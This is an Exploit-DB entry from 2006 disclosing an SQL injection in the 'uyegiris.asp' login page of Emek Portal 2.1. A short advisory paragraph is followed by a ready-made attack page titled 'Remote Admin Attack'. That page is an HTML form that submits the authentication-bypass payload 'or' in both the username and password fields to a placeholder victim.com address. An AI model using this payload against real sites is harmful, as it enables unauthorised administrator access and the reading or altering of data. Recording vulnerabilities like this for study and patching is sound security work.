Emek Portal 2.1 - 'Uyegiris.asp' SQL Injection

EDB-ID:

28768


Author:

Dj ReMix

Type:

webapps


Platform:

ASP

Date:

2006-10-06


source: https://www.securityfocus.com/bid/20378/info

Emek Portal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

This issue affects version 2.1; other versions may also be vulnerable.

<title>Remote Admin Attack - BiyoSecurity.Org</title> <center> RMx - BiyoSecurtiy.Org</center> <FORM NAME=giris ACTION="http://victim.com/Path to script/uyegiris.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=k_a class="input" value="'or'" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=sifre TYPE=text class="input" value="'or'" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> </tr></table></form>